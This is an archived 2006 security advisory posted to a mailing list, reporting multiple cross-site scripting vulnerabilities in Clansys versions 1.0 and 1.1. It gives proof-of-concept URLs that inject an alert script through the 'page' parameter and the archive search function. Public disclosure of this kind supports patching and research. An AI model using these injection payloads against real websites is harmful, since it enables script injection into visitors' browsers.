OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Clansys Multiple Xss Vulnerabilities

Soothackersgmail.com
Date: Wed Apr 12 2006 - 17:47:55 CDT


---------------------------------------------
 Clansys v.1.1 Multiple Xss Vulnerabilities
---------------------------------------------

 Bug:
 Clansys v.1.0
  1- http://victim/path/index.php?page=archiv&func=search
     "><script>alert(/Soot/)</script>

 Clansys v.1.1
  1- http://victim/path/index.php?page="><script>alert(/Soot/)</script>

  2- http://victim/path/index.php?page=archiv&func=search
     "><script>alert(/Soot/)</script>

---------------------------------------------
 Source :
  http://soot.shabgard.org/bugs/Clansys.txt

 Credit :
  Soot
  Shabgard Security Team
  http://www.shabgard.org

 Greetz :
  Hregy,Elite,Bl2k,Littlehacker
---------------------------------------------